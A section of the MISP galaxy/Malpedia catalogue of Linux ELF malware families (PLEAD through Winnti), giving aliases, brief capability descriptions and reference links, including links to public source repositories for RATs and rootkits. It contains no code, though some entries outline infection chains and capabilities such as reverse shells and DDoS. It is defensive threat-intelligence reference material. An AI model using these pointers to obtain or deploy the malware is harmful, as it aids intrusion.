The tag is: misp-galaxy:malpedia="PLEAD (ELF)"

PLEAD (ELF) is also known as:

Table 1058. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead
https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020
https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

PRISM

The tag is: misp-galaxy:malpedia="PRISM"

PRISM is also known as:

waterdrop

Table 1059. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.prism
https://cybersecurity.att.com/blogs/labs-research/prism-attacks-fly-under-the-radar

PrivetSanya

Black Lotus Labs identified malware for the Windows Subsystem for Linux (WSL). Mostly written in Python but compiled as Linux ELF files.

The tag is: misp-galaxy:malpedia="PrivetSanya"

PrivetSanya is also known as:

Table 1060. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.privet_sanya
https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/

Prometei

The tag is: misp-galaxy:malpedia="Prometei"

Prometei is also known as:

Table 1061. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities
https://cujo.com/iot-malware-journals-prometei-linux/
https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—a-ransomware—and-a-botnet-join-the-part.html
https://twitter.com/IntezerLabs/status/1338480158249013250
https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

Pro-Ocean

Unit 42 describes this as a malware used by Rocke Group that deploys an XMRig miner.

The tag is: misp-galaxy:malpedia="Pro-Ocean"

Pro-Ocean is also known as:

Table 1062. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.pro_ocean
https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/
https://seguranca-informatica.pt/new-cryptojacking-malware-called-pro-ocean-is-now-attacking-apache-oracle-and-redis-servers/

pupy (ELF)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (ELF)"

pupy (ELF) is also known as:

Table 1063. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy
https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf
https://github.com/n1nj4sec/pupy

QNAPCrypt

The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:

The ransom note was included solely as a text file, without any message on the screen—naturally, because it is a server and not an endpoint.
Every victim is provided with a different, unique Bitcoin wallet—this could help the attackers avoid being traced.
Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.

The tag is: misp-galaxy:malpedia="QNAPCrypt"

QNAPCrypt is also known as:

eCh0raix

Table 1064. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/
https://www.anomali.com/blog/the-ech0raix-ransomware
https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/
https://www.qnap.com/en/security-advisory/QSA-20-02
https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt
https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/
https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/
https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/
https://www.ibm.com/downloads/cas/Z81AVOY7

QSnatch

The malware infects QNAP NAS devices, is persisting via various mechanisms and resists cleaning by preventing firmware updates and interfering with QNAP MalwareRemover. The malware steals passwords and hashes

The tag is: misp-galaxy:malpedia="QSnatch"

QSnatch is also known as:

Table 1065. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch
https://bin.re/blog/the-dga-of-qsnatch/
https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices
https://us-cert.cisa.gov/ncas/alerts/aa20-209a
https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf

r2r2

The tag is: misp-galaxy:malpedia="r2r2"

r2r2 is also known as:

Table 1066. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2
https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/

Rakos

The tag is: misp-galaxy:malpedia="Rakos"

Rakos is also known as:

Table 1067. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos
http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/
https://journal.cecyf.fr/ojs/index.php/cybin/article/view/16/22

RansomEXX (ELF)

The tag is: misp-galaxy:malpedia="RansomEXX (ELF)"

RansomEXX (ELF) is also known as:

Defray777

Table 1068. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx
https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/
https://www.youtube.com/watch?v=qxPXxWMI2i4
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

RaspberryPiBotnet

The tag is: misp-galaxy:malpedia="RaspberryPiBotnet"

RaspberryPiBotnet is also known as:

Table 1069. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.raspberrypibotnet
https://kindredsec.com/2019/06/03/code-analysis-of-basic-cryptomining-malware/

rat_hodin

The tag is: misp-galaxy:malpedia="rat_hodin"

rat_hodin is also known as:

Table 1070. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rat_hodin
https://github.com/Thibault-69/RAT-Hodin-v2.5

rbs_srv

The tag is: misp-galaxy:malpedia="rbs_srv"

rbs_srv is also known as:

Table 1071. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rbs_srv
https://github.com/Thibault-69/Remote_Shell

RedXOR

The tag is: misp-galaxy:malpedia="RedXOR"

RedXOR is also known as:

Table 1072. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.redxor
https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/

Rekoobe

A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan’s configuration data is stored in a file encrypted with XOR algorithm

The tag is: misp-galaxy:malpedia="Rekoobe"

Rekoobe is also known as:

Table 1073. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe
https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/
https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/
https://vms.drweb.com/virus/?i=7754026&lng=en

reptile

The tag is: misp-galaxy:malpedia="reptile"

reptile is also known as:

Table 1074. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile
https://github.com/f0rb1dd3n/Reptile

REvil (ELF)

ELF version of win.revil targeting VMware ESXi hypervisors.

The tag is: misp-galaxy:malpedia="REvil (ELF)"

REvil (ELF) is also known as:

REvix

Table 1075. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5
https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment
https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20
https://github.com/f0wl/REconfig-linux
https://www.youtube.com/watch?v=ptbNMlWxYnE
https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released
https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide
https://twitter.com/VK_Intel/status/1409601311092490248
https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/
https://twitter.com/VK_Intel/status/1409601311092490248?s=20
https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/
https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/
https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version
https://threatpost.com/ransomware-revil-sites-disappears/167745/

Rex

The tag is: misp-galaxy:malpedia="Rex"

Rex is also known as:

Table 1076. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex
https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/

RHOMBUS

The tag is: misp-galaxy:malpedia="RHOMBUS"

RHOMBUS is also known as:

Table 1077. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rhombus
https://old.reddit.com/r/LinuxMalware/comments/fh3zar/memo_rhombus_an_elf_bot_installerdropper/

Roboto

P2P Botnet discovered by Netlab360. The botnet infects linux servers via the Webmin RCE vulnerability (CVE-2019-15107) which allows attackers to run malicious code with root privileges and take over older Webmin versions. Based on the Netlabs360 analysis, the botnet serves mainly 7 functions: reverse shell, self-uninstall, gather process' network information, gather Bot information, execute system commands, run encrypted files specified in URLs and four DDoS attack methods: ICMP Flood, HTTP Flood, TCP Flood, and UDP Flood.

The tag is: misp-galaxy:malpedia="Roboto"

Roboto is also known as:

Table 1078. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.roboto
https://blog.netlab.360.com/the-awaiting-roboto-botnet-en
https://www.zdnet.com/article/new-roboto-botnet-emerges-targeting-linux-servers-running-webmin

RotaJakiro

RotaJakiro is a stealthy Linux backdoor which remained undetected between 2018 and 2021. The malware uses rotating encryption to encrypt the resource information within the sample, and C2 communication, using a combination of AES, XOR, ROTATE encryption and ZLIB compression.

The tag is: misp-galaxy:malpedia="RotaJakiro"

RotaJakiro is also known as:

Table 1079. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro
https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/
https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro
https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

Satori

Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).

The tag is: misp-galaxy:malpedia="Satori"

Satori is also known as:

Table 1080. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori
https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/
https://www.arbornetworks.com/blog/asert/the-arc-of-satori/
http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/
https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/
http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori
http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/
https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/

ShellBind

The tag is: misp-galaxy:malpedia="ShellBind"

ShellBind is also known as:

Table 1081. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind
http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry

Shishiga

The tag is: misp-galaxy:malpedia="Shishiga"

Shishiga is also known as:

Table 1082. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga
https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/

Silex

The tag is: misp-galaxy:malpedia="Silex"

Silex is also known as:

silexbot

Table 1083. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.silex
https://www.bleepingcomputer.com/news/security/new-silex-malware-trashes-iot-devices-using-default-passwords/

SLAPSTICK

According to FireEye, SLAPSTICK is a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.

The tag is: misp-galaxy:malpedia="SLAPSTICK"

SLAPSTICK is also known as:

Table 1084. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.slapstick
https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html

Spamtorte

The tag is: misp-galaxy:malpedia="Spamtorte"

Spamtorte is also known as:

Table 1085. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte
https://cis.verint.com/2016/11/08/spamtorte-version-2/

SpeakUp

The tag is: misp-galaxy:malpedia="SpeakUp"

SpeakUp is also known as:

Table 1086. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup
https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Specter

The tag is: misp-galaxy:malpedia="Specter"

Specter is also known as:

Table 1087. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.specter
https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/

Speculoos

The tag is: misp-galaxy:malpedia="Speculoos"

Speculoos is also known as:

Table 1088. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.speculoos
https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

SSHDoor

The tag is: misp-galaxy:malpedia="SSHDoor"

SSHDoor is also known as:

Table 1089. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor
https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/
http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html

Stantinko

The tag is: misp-galaxy:malpedia="Stantinko"

Stantinko is also known as:

Table 1090. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.welivesecurity.com/2020/08/07/stadeo-deobfuscating-stantinko-and-more/
https://www.welivesecurity.com/2020/03/19/stantinko-new-cryptominer-unique-obfuscation-techniques/
https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/
https://www.welivesecurity.com/2019/11/26/stantinko-botnet-adds-cryptomining-criminal-activities/
https://www.intezer.com/blog/research/stantinkos-proxy-after-your-apache-server/

STEELCORGI

According to FireEye, STEELCORGI is a packer for Linux ELF files that makes use of execution guardrails by sourcing decryption key material from environment variables.

The tag is: misp-galaxy:malpedia="STEELCORGI"

STEELCORGI is also known as:

Table 1091. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.steelcorgi
https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html
https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/
https://yoroi.company/research/opening-steelcorgi-a-sophisticated-apt-swiss-army-knife/

Sunless

The tag is: misp-galaxy:malpedia="Sunless"

Sunless is also known as:

Table 1092. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless
https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/

sustes miner

Sustes Malware doesn’t infect victims by itself (it’s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software.

The tag is: misp-galaxy:malpedia="sustes miner"

sustes miner is also known as:

Table 1093. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes
https://marcoramilli.com/2018/09/20/sustes-malware-cpu-for-monero/

Suterusu

The tag is: misp-galaxy:malpedia="Suterusu"

Suterusu is also known as:

HCRootkit

Table 1094. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.suterusu
https://www.lacework.com/blog/hcrootkit-sutersu-linux-rootkit-analysis/

TeamTNT

The tag is: misp-galaxy:malpedia="TeamTNT"

TeamTNT is also known as:

Table 1095. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt
https://cybersecurity.att.com/blogs/labs-research/teamtnt-delivers-malware-with-new-detection-evasion-tool
https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials
https://www.anomali.com/blog/inside-teamtnts-impressive-arsenal-a-look-into-a-teamtnt-server
https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf
https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment
https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf
https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/
https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/
https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools

TheMoon

The tag is: misp-galaxy:malpedia="TheMoon"

TheMoon is also known as:

Table 1096. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.themoon
https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers
https://www.sans.org/reading-room/whitepapers/malicious/analyzing-backdoor-bot-mips-platform-35902

TNTbotinger

The tag is: misp-galaxy:malpedia="TNTbotinger"

TNTbotinger is also known as:

Table 1097. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger
https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html
https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/

Torii

The tag is: misp-galaxy:malpedia="Torii"

Torii is also known as:

Table 1098. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii
https://blog.avast.com/new-torii-botnet-threat-research

Trump Bot

The tag is: misp-galaxy:malpedia="Trump Bot"

Trump Bot is also known as:

Table 1099. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot
http://paper.seebug.org/345/

TSCookie

The tag is: misp-galaxy:malpedia="TSCookie"

TSCookie is also known as:

Table 1100. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.tscookie
https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html
https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf
https://www.macnica.net/pdf/mpressioncss_ta_report_2019_4_en.pdf
https://www.macnica.net/file/mpressioncss_ta_report_2019_4.pdf
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf
https://twitter.com/ESETresearch/status/1382054011264700416
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

tsh

The tag is: misp-galaxy:malpedia="tsh"

tsh is also known as:

Table 1101. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsh
https://github.com/creaktive/tsh

Tsunami (ELF)

The tag is: misp-galaxy:malpedia="Tsunami (ELF)"

Tsunami (ELF) is also known as:

Amnesia
Muhstik
Radiation

Table 1102. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://blog.aquasec.com/fileless-malware-container-security
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775
https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/
http://get.cyberx-labs.com/radiation-report
https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/
https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/
http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf
https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/

Turla RAT

The tag is: misp-galaxy:malpedia="Turla RAT"

Turla RAT is also known as:

Table 1103. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat

Umbreon

The tag is: misp-galaxy:malpedia="Umbreon"

Umbreon is also known as:

Espeon

Table 1104. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon
http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/
http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html

Unidentified Linux 001

According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.

The tag is: misp-galaxy:malpedia="Unidentified Linux 001"

Unidentified Linux 001 is also known as:

Table 1105. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001
https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

Unidentified ELF 003

This is an implant used by APT31 on home routers to utilize them as ORBs.

The tag is: misp-galaxy:malpedia="Unidentified ELF 003"

Unidentified ELF 003 is also known as:

Table 1106. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_003
https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003
https://twitter.com/billyleonard/status/1417910729005490177
https://twitter.com/bkMSFT/status/1417823714922610689

Vermilion Strike (ELF)

The tag is: misp-galaxy:malpedia="Vermilion Strike (ELF)"

Vermilion Strike (ELF) is also known as:

Table 1107. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike
https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/

elf.vpnfilter

The tag is: misp-galaxy:malpedia="elf.vpnfilter"

elf.vpnfilter is also known as:

Table 1108. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter
https://www.trendmicro.com/en_us/research/21/a/vpnfilter-two-years-later-routers-still-compromised-.html
https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1
https://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf
https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html
https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/
https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/
https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html
https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected
https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
https://blog.talosintelligence.com/2018/05/VPNFilter.html
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en
https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware

WatchBog

According to Intezer, this is a spreader module used by WatchBog. It is a dynamically linked ELF executable, compiled with Cython. C&C adresses are fetched from Pastebin. C&C communication references unique identification keys per victim. It contains a BlueKeep scanner, reporting positively scanned hosts to the C&C server (RC4 encrypted within SSL/TLS). It contains 5 exploits targeting Jira, Exim, Solr, Jenkins and Nexus Repository Manager 3.

The tag is: misp-galaxy:malpedia="WatchBog"

WatchBog is also known as:

Table 1109. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.watchbog
https://intezer.com/blog/linux/watching-the-watchbog-new-bluekeep-scanner-and-linux-exploits/

WellMail

The tag is: misp-galaxy:malpedia="WellMail"

WellMail is also known as:

Table 1110. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmail
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmail.html
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

elf.wellmess

The tag is: misp-galaxy:malpedia="elf.wellmess"

elf.wellmess is also known as:

Table 1111. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess
https://us-cert.cisa.gov/ncas/alerts/aa21-116a
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf
https://securelist.com/apt-trends-report-q2-2020/97937/
https://community.riskiq.com/article/541a465f/description
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html
https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf
https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf
https://blog.talosintelligence.com/2020/08/attribution-puzzle.html

Winnti (ELF)

The tag is: misp-galaxy:malpedia="Winnti (ELF)"

Winnti (ELF) is also known as:

Table 1112. Table References
Links
